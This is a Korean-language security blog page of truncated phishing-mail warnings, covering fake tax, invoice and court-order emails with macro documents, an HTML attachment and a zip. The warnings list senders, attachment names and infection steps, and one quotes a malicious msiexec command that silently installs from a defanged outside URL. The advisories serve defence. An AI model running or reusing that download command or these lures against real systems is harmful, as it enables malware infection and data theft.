태군 코드 : Security, travel & communication

최근 타켓형 악성메일과 특정 기업을 사칭한 악성메일이 꾸준히 발생을 하고 있으므로, 사용자들의 주의가 필요할것으로 보입니다. 발신자 : doaa.shaban@ten.tv (지속적으로 변경되고 있음) 제목 : 통보 76386154-20191203 (변경가능) 첨부파일명 : 통보 76386154-20191203.doc (변경가능) 해당 메일확인시 통보 (임의숫자).doc 파일을 포함하고 있으며, 본문에는 업무성 메일로 위장을 하고 있어 사용자가 첨부파일을 열도록 유도를 하고 있습니다. 문서를 열경우 파워쉘을 이용하여 악성파일을 다운로드 받으며, 해당 악성파일은 추가로 외부와통신을 하여 추가 악성행위를 수행하도록 설정되어 있습니다. filename: C:\Users\admin\105.exe md5: 48ca1..

국세청을 위장한 악성메일이 추가로 발견 되었습니다. 발신자 : david@mustix.com 외 다수 제목 : 국세청송장, 송장, 과세 요청 외 다수 첨부파일명 : eTaxInvoice_654281.html (변경될수 있음) 메일의 본문을 살펴보면 기존과는 다르게 html 파일을 첨부하고 있으며, 보안장비를 우회하려는 것으로 보입니다. 첨부된 html 파일의 내용입니다. 첨부파일 실행시 특정 URL을 호출하여 기존과 동일한 매크로 형태의 엑셀 파일을 다운로드 받게 이루어져 있습니다. 확일결과 해당 메일은 정보탈취형 악성코드로 확인이 되며 메일 실행 절차는 다음과 같습니다. 1. 국세청을 사칭한 첨부된 html 파일 실행 2. 특정 URL로 연결되어 다운로드 경고창 발생 다운로드 실행시 악성 매크로가 포함..

발신자 : paraic.hickey@dunbarlunn.com 외 다수 제목 : 서류 첨부파일명 : 1333327437141.xls (숫자 변경) 해당 메일은 본문내용 없이 '삼성 갤럭시 스마트폰에서 보냈습니다.'라는 문구와 숫자로 된 엑셀파일이 첨부되어 있습니다. 첨부된 엑셀 파일을 실행시키면 엑셀창이 뜨면서 '콘텐츠 사용' 이라는 보안경고 창이 활성화 되고 매크로 사용을 유도 하고 있습니다. 보안 경고를 무시하고 '콘텐츠 사용'을 누를경우 매크로를 수행해 외부로 부터 악성코드가 다운로드 됩니다. "msiexec.exe" with commandline "RESTART=AUTO /i hxxp://velquene.net/mshost1 /q ADRESS='%TMP%'" 현재 다수의 백신에서 미탐지 중이며, ..

최근 다양한 형태의 악성매크로 파일을 포함하여 악성메일이 유포되고 있어 주의가 필요할 것으로 보입니다. 발신자 : 다수의 발신자제목 : 송장_00190821 / 요청한 문서 / No subject (제목없음)첨부파일명 : 송장_00190821.doc / temp_[13자리 숫자]_[10자리숫자].xls / 2019-02-19_0841.zip 메일을 살펴보시면 시루정보의 정재민 차장을 사칭하는 명함이 포함되어 있고, 송장_00190821.doc 문서파일을 첨부하고 있습니다. 첨부파일을 실행 시키면 상단에 노란색 보안경고 창이 나타나며 [사용하기]를 누를경우 악성 매크로를 수행하게 이루어져 있습니다. 첨부파일의 속성을 보시면 실제 매크로가 포함되어 있는것을 알수 있으며, 최종 수정 일시는 19일 새벽에 추측..

최근 법원을 사칭하여 악성메일이 유포되고 있는 정황이 확인 되었습니다. 발신자 : ysj@jnpa.co.kr (변경가능) 제목 : 법원 명령 (변경가능) 첨부파일명 : S12GF803.zip (변경가능) 메일을 확인해 보면 발신자와 수신자가 동일한것을 확인할수 있으며, 본문 내용에는 파일에 첨부 된 법원 명령 및 사건을 확인하라는 내용이며 번역기를 돌려 한국어로 메일을 보낸것으로 추정이 됩니다. 첨부된 zip 파일안에는 실행파일이 첨부되어 있는것을 확인할수 있습니다. 최근 다양한 방식으로 악성메일이 유포되고 있고, 발신자, 수신자, 제목 등 변경이 가능하니 참고 하시면 되실것 같습니다.